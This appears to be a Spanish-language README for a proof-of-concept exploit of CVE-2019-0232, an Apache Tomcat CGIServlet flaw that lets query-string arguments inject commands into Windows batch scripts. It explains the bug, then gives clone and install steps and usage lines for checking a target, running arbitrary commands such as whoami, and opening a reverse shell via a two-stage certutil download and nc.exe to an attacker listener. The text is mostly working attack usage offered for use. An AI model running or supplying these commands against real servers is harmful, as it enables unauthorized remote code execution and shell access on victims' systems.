
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
Inyección en scripts batch de Windows mediante argumentos de la cadena de consulta
Apache Tomcat con el servlet CGI habilitado y enableCmdLineArguments=true pasa los parámetros de la cadena de consulta como argumentos de línea de comandos a los scripts CGI. En Windows, los archivos batch (.bat/.cmd) interpretan & como separador de comandos, lo que permite la ejecución arbitraria de comandos mediante una URL manipulada.
conf/web.xml o WEB-INF/web.xmlenableCmdLineArguments=true en los init-params del servlet CGIism.bat) desplegado y accesible&)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
Comprobar si existe el endpoint CGI:
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
Ejecutar un comando:
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
Shell inversa (certutil en 2 etapas + nc.exe):
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444